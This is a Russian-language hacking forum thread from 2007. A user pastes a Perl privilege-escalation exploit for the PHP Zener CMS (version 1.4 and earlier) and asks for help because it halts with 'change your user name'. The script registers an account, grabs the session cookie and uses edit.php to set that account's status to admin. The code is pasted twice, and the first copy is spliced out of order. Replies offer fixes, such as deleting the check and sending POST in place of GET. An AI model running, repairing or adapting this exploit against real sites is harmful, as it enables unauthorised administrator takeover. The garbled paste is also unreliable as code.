Помогите править сплоит на Perle
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите править сплоит на Perle - 2007-02-13 09:55:41.673333
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
#!/usr/bin/perl
use IO::SOCKET;
# ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
# PHP Zener <=1.4 get user-admin exploit
# DSS[TeaM] // www.dss.jino-net.ru
# Write by DoSiS
# ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
# usage:
# perl zener.pl http://$serv";
$path .= $fold;
$path .= 'register.php?isok=yes&name=';
$path .= $login;
$path .= '&pass=';
$path .= $pass;
$path .= '&email_=dss@dss.dss';
print $socket "GET $path HTTP/1.0\r\n\r\n";
@ans = <$socket>;
foreach $_ (@ans) {
if (/Set-Cookie/) {
$ses = substr($_,22,32);
}}
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$serv",
PeerPort => "80") || die "$socket error connect!";
$path = "http://$serv";
$path .= $fold;
$path .= 'index.php?page=inf_red.php';
print "[ + ] get id number\n";
print $socket "GET $path HTTP/1.0\n";
print $socket "Cookie: PHPSESSID=$ses\r\n\r\n";
@ans = <$socket>;
foreach $_ (@ans) {
if (/name=\"ed\"/) {
$ed = substr($_,38);
}}
if ($ed eq "") {
print "[ - ] change your user name\n";
exit;}
if ($ed=~/\r\n/) {
$ed =~ s/">\r\n//g;
}
else {
$ed =~ s/">\n//g;
}
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$serv",
PeerPort => "80") || die "$socket error connect!";
$path = "http://$serv";
$path .= $fold;
$path .= 'edit.php?ed=';
$path .= $ed;
$path .= '&stat=admin&pass_=';
$path .= $pass;
$path .= '&email_=dss@dss.dss';
print "[ + ] edit user on admin\n";
print $socket "GET $path HTTP/1.0\n";
print $socket "Cookie: PHPSESSID=$ses\r\n\r\n";
print "[ + ] mission complete\n";
sub info() {
print q(############################################################
PHP Zener <=1.4 get user-admin exploit
DSS[TeaM] // www.dss.jino-net.ru
Write by DoSiS
############################################################
usage:
perl zener.pl [dir] [user] [pass]
############################################################
);
exit;
}
скомпилил ++++++++++++++++++++++++++++++++++++++++++++++++
после get iв number вместо mission complet
пишет : change your user name.
нужно изменить имя помагите в перле не силён
"> [dir] [user] [pass]
# ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
if (@ARGV < 4) {
info();
}
$serv=$ARGV[0];
$fold=$ARGV[1];
$login=$ARGV[2];
$pass=$ARGV[3];
print "[ + ] connecting…\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$serv",
PeerPort => "80") || die "$socket error connect!";
print "[ + ] registration user\n";
$path = "http://$serv";
$path .= $fold;
$path .= 'register.php?isok=yes&name=';
$path .= $login;
$path .= '&pass=';
$path .= $pass;
$path .= '&email_=dss@dss.dss';
print $socket "GET $path HTTP/1.0\r\n\r\n";
@ans = <$socket>;
foreach $_ (@ans) {
if (/Set-Cookie/) {
$ses = substr($_,22,32);
}}
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$serv",
PeerPort => "80") || die "$socket error connect!";
$path = "http://$serv";
$path .= $fold;
$path .= 'index.php?page=inf_red.php';
print "[ + ] get id number\n";
print $socket "GET $path HTTP/1.0\n";
print $socket "Cookie: PHPSESSID=$ses\r\n\r\n";
@ans = <$socket>;
foreach $_ (@ans) {
if (/name=\"ed\"/) {
$ed = substr($_,38);
}}
if ($ed eq "") {
print "[ - ] change your user name\n";
exit;}
if ($ed=~/\r\n/) {
$ed =~ s/">\r\n//g;
}
else {
$ed =~ s/">\n//g;
}
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$serv",
PeerPort => "80") || die "$socket error connect!";
$path = "http://$serv";
$path .= $fold;
$path .= 'edit.php?ed=';
$path .= $ed;
$path .= '&stat=admin&pass_=';
$path .= $pass;
$path .= '&email_=dss@dss.dss';
print "[ + ] edit user on admin\n";
print $socket "GET $path HTTP/1.0\n";
print $socket "Cookie: PHPSESSID=$ses\r\n\r\n";
print "[ + ] mission complete\n";
sub info() {
print q(############################################################
PHP Zener <=1.4 get user-admin exploit
DSS[TeaM] // www.dss.jino-net.ru
Write by DoSiS
############################################################
usage:
perl zener.pl [dir] [user] [pass]
############################################################
);
exit;
}
скомпилил ++++++++++++++++++++++++++++++++++++++++++++++++
после get iв number вместо mission complet
пишет : change your user name.
нужно изменить имя помагите в перле не силён
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 10:31:24.136666
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
ну што некто не поможет ???
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 17:48:00.130000
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
change your user name.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 18:03:25.350000
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
Я бы вот это вырезал для начала:
quote:
if ($ed eq "") {
print "[ - ] change your user name\n";
exit;}
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 18:07:53.403333
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
quote:
ORIGINAL: -=lebed=-
Я бы вот это вырезал для начала:
quote:
if ($ed eq "") {
print "[ - ] change your user name\n";
exit;}
Бгг ))
Дык можно ваще весь скрипт закомментировать, он и не пикнет.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 19:15:27.290000
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
Походу, данный юзер просто не зареган в системе.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 21:19:49.573333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Вы читайте внимательней он его СКОМПИЛИЛ !!![sm=bj.gif]
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-13 21:57:46.960000
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
quote:
ORIGINAL: blonx
Вы читайте внимательней он его СКОМПИЛИЛ !!![sm=bj.gif]
А что? Есть ксати проги, делающие из программы под интерпретатор Perl`а исполняемый exeшник…
Так что некуя так заливаться http://www.indigostar.com/perl2exe.htm
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-14 11:01:11.526666
|
|
|
FreX
Сообщений: 299
Оценки: 0
Присоединился: 2006-11-24 20:42:39.370000
|
blonx
А как по твоему запускаются Перл проги? Не компелируясь? :) Они тож компилятся, только в оперативную память и в контексте интерпритатора Перл.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-14 11:16:34.760000
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Бедная оперативная память. Фигово наверное, когда в тебя всё время компилируют.. да ещё и интерпретатор в контексте.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 08:39:08.353333
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
всёровно ругается подскажите по подробней с конфигурацией ……….. :)
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 11:38:00.543333
|
|
|
halkfild
Сообщений: 286
Оценки: 0
Присоединился: 2006-11-27 18:26:36.310000
|
программы на perl не компилятся а интерпретируются..
читай начало скрипта..
quote:
change your user name.
8| это выдает после проверки аутентификации..
значит смотри даные пользователя…
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-15 20:08:06.516666
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
А как по твоему запускаются Перл проги? Не компелируясь? :) Они тож компилятся, только в оперативную память и в контексте интерпритатора Перл.
В данном случае слово "скомпилил" свучит как си бемоль из третьей симфонии Баха.
Если уж на то пошло дело правильнее было бы написать "запустил".
И вообще мне кажиться что прежде чем задавать такие вопросы, нужно подштудировать маленько и знать, какой язык является компилируемым,
а какой интерпретируемым, а если чел даже этих основ не знает, то какого он вообще собрался программировать?
И толку, что ты ему щас по поводу данного скрипта посоветуешь, ему все равно нужно все по полкам разложить и дать готовый результат.
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-16 04:55:36.130000
|
|
|
atoll
Сообщений: 21
Оценки: 0
Присоединился: 2007-02-07 01:17:57.076666
|
Не проще было подсказать ему?Чем отправлять учиться.Если он не знает перл это не значит что он ничего не знает
Выучит и перл со временем.
Latika
тебе правильно почти подсказали.И понятно и без перл почему скрипт не работает - "GET $path HTTP/1.0\n";Выполнение этого запроса отключено и этот скрипт будет работать но там где они разрешены.
а так как здесь не обрабатывается проверка то скрипт получив"" - пустую строкуf ($ed eq "") отрабатывает на выход с мессагой
Есть вариант заменить вместо GET - POST запрос.Но возможно придется доработать скрипт.
В принципе ты справишся сам.В гугле полно туториалов по этой теме и перл здесь не причем.Вот тебе один линк http://forum.zloy.org/showthread.php?t=8937 куда я набрел случайно
и как раз для тебя короткий тутор по сокетам и все разжевано.И у тебя все получиться.
print "[ + ] get id number\n";
print $socket "POST $path HTTP/1.0\n";
………………………………………….
if ($ed eq "") {
print "[ - ] change your user name\n";
exit;}
|
|
|
|
|
RE: Помогите править сплоит на Perle - 2007-02-16 05:16:15.196666
|
|
|
Latika
Сообщений: 12
Оценки: 0
Присоединился: 2007-02-06 01:36:24.096666
|
Спасибо атолл буду пробывать
если взять кусок бумаги што то там краски и клей :)
|
|
|
|
|
|
